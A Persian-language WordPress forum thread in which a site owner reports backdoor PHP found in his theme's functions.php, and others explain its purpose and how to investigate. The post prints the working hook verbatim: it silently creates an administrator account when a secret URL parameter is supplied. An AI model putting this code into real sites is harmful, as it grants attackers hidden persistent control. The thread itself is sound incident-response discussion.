آموزش های عمومیامنیتبخش وردپرسعمومیوردپرس

هک شدن وردپرس با اضافه شدن کد به functions.php

هک شدن وردپرس با اضافه شدن کد به functions.php
هک شدن وردپرس با اضافه شدن کد به functions.php
هک شدن وردپرس با اضافه شدن کد به functions.php
هک شدن وردپرس با اضافه شدن کد به functions.php
هک شدن وردپرس با اضافه شدن کد به functions.php

نوشته : majid1889

سلام رفقا !

من تقریبا یه سال پیش یه سایتی ساختم امروز که بهش سر زدم ، دیدم بالای سایت ی خط ارور داده که مربوط به فایل functions.php می شد

وقتی فایل رو چک کردم دیدم همچین کدی اضافه شده :

add_action( 'wp_head', 'my_back' );
function my_back() {
 if ( $_GET['back'] == 'drjtd4v4' ) {
 require( 'wp-includes/registration.php' );
 if ( !username_exists( 'mr_admin' ) ) {
 $user_id = wp_create_user( 'guest', 'drjtd4v4' );
 $user = new WP_User( $user_id );
 $user->set_role( 'administrator' );
 }
 }
}

کل پوسته رو خودم نوشتم و مطمئنم این کل مال من نیست .

1. چطور کسی تونسته همچین کدی رو اضافه کنه و چه تضمینی هست دوباره اینکار انجام نشه ؟

اینطور که از کد مشخصه میاد ی یوزر میسازه و ادمینش میکنه و طبیعتا سایت مال اون میشه

ولی 2. سوال اینجاس کسی که تونسته توی فایل functions.php تغییر ایجاد کنه چه نیازی به یوزر داره ؟؟

نوشته : Fara MarZ

در 8 ساعت قبل، majid1889 گفته است :
1. چطور کسی تونسته همچین کدی رو اضافه کنه و چه تضمینی هست دوباره اینکار انجام نشه ؟
2. سوال اینجاس کسی که تونسته توی فایل functions.php تغییر ایجاد کنه چه نیازی به یوزر داره ؟؟

سلام

1. برای اینکار روش های مختلفی وجود داره (مثلاً پلاگین هایی که اجازه و دسترسی به ویرایشگر رو ایجاد میکنه یا داشتن یوزر و پس ادمین یا داشتن یوزر و پس هاست یا در هاست های اشتراکی هک کردن یکی از سایت های موجود در هاست و … )

2. هکر ها از این نوع کد های به عنوان بک دور استفاده می کنن تا اگر ادمین از هک شدن سایت با خبر شد و رمز ها و پلاگین ها و دسترسی ها رو چک و درست کرد و دسترسی هکر صلب شد بتونه دوباره به سایت دسترسی داشته باشه

(وقتی این از نوع کد ها رو وارد میکنن تا چند وقت سایت رو تحت نظر می گیرن تا بک آپ و … همه حاوی کد بشن بعداً سایت رو به هم میریزن)

نوشته : majid1889

در 6 ساعت قبل، Fara-MarZ گفته است :
سلام
1. برای اینکار روش های مختلفی وجود داره (مثلاً پلاگین هایی که اجازه و دسترسی به ویرایشگر رو ایجاد میکنه یا داشتن یوزر و پس ادمین یا داشتن یوزر و پس هاست یا در هاست های اشتراکی هک کردن یکی از سایت های موجود در هاست و … )
2. هکر ها از این نوع کد های به عنوان بک دور استفاده می کنن تا اگر ادمین از هک شدن سایت با خبر شد و رمز ها و پلاگین ها و دسترسی ها رو چک و درست کرد و دسترسی هکر صلب شد بتونه دوباره به سایت دسترسی داشته باشه
(وقتی این از نوع کد ها رو وارد میکنن تا چند وقت سایت رو تحت نظر می گیرن تا بک آپ و … همه حاوی کد بشن بعداً سایت رو به هم میریزن)

مرسی :)

بنظر شما کدوم یک از این پلاگین ها میتونن همچین دسترسی یی داده باشن ؟

نوشته : Neymad

در در 1/23/2017 at 15:44، majid1889 گفته است :
بنظر شما کدوم یک از این پلاگین ها میتونن همچین دسترسی یی داده باشن ؟

پلاگینها رو دانلود کنید و کد مربوطه رو توی اونها سرچ کنید

نوشته : majid1889

در 5 ساعت قبل، yaali گفته است :
پلاگینها رو دانلود کنید و کد مربوطه رو توی اونها سرچ کنید

:mellow:

قطعا این کد تو هیچکدومشون نیست

نوشته : Neymad

در 1 ساعت قبل، majid1889 گفته است :
قطعا این کد تو هیچکدومشون نیست

من فکر کردم منظورتون اینه که افزونه ای نصب شده که این کد همراهش بوده

نوشته : 4MR

دوستان توصیه میشه این پلاگین رو نصب کنید اگه اکسپولیتی براشون تو دیتابیس های همچون db-expolite ,… ثبت شده باشه اطلاع میده.

https://wordpress.org/plugins/plugin-vulnerabilities/

نوشته : Babak T

سلام باید عرض کنم خدمتتون که هیچ تضمینی وجود نداره که خود هسته وردپرس هم اسیب پذیر نباشه…

اما برای این که شما فایل اسیب پذیررا پیدا کنین و ببینین هکر چطوری کد را اضافه کرده باید لاگ ها را بررسی کنین

یاعلی.


(1) 17 هک و کد کاربردی برای فایل فانکشن
17 هک و کد کاربردی برای فایل فانکشن functions.php وردپرس هاست وردپرس فارسی


(2) functions.php در وردپرس
استفاده از افزونه یا اضافه کردن کد به functions.php در وردپرس - نوین وردپرس - قالب وردپرس افزونه وردپرس پوسته وردپرس


(3) 9 هک وردپرس کاربردی در فایل functions
9 هک وردپرس کاربردی در فایل functions.php بهمراه کدها - کدنویسی به زبان ساده


(4) آموزش روش های فعال کردن حالت تعمیر سایت
آموزش روش های فعال کردن حالت تعمیر سایت در وردپرس - هاست نگار


(5) افزونه وردپرس نال شده
شناسایی ویروس و کد های مخرب قالب و افزونه وردپرس نال شده


(6) Function.php وردپرس
آموزش قرار دادن کد دلخواه در Function.php وردپرس بدون خرابی سایت - وبجامه - مرجع آموزش وب در ایران


(7) هک وردپرس چیست چگونه دروردپرس هک می
هک وردپرس چیست چگونه دروردپرس هک می شویم - ماهدیس وب


(8) ترفند های فایل توابع وردپرس Functions
ترفند های فایل توابع وردپرس Functions.php دیجی وردپرس


(9) اکانت ادمین وردپرس
آموزش نحوه اضافه کردن اکانت ادمین وردپرس از طریق FTP - وبلاگ برتینا


(10) بدافزار وردپرس 2020 Monit.php متخصص
بدافزار وردپرس 2020 Monit.php متخصص هک وردپرس شماست - وبلینو

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

سه × چهار =

دکمه بازگشت به بالا